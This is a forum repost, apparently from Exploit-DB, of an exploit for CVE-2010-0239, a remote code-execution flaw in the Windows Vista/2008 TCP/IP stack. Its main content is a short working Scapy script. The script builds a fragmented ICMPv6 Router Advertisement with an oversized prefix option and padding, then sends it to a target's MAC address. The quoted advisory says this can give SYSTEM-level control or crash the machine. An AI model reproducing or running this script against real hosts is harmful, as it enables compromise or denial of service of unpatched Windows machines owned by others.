Exploit Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33594
Проверка EDB
  1. Пройдено
Автор
SUMIT GWALANI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2010-0239
Дата публикации
2010-02-09
Код:
source: https://www.securityfocus.com/bid/38061/info

Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. 


v6_dst = "<IPv6 address>"

mac_dst = "<Mac address>"

pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

l=fragment6(pkt, 1500)

for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")
 
Источник
www.exploit-db.com

Похожие темы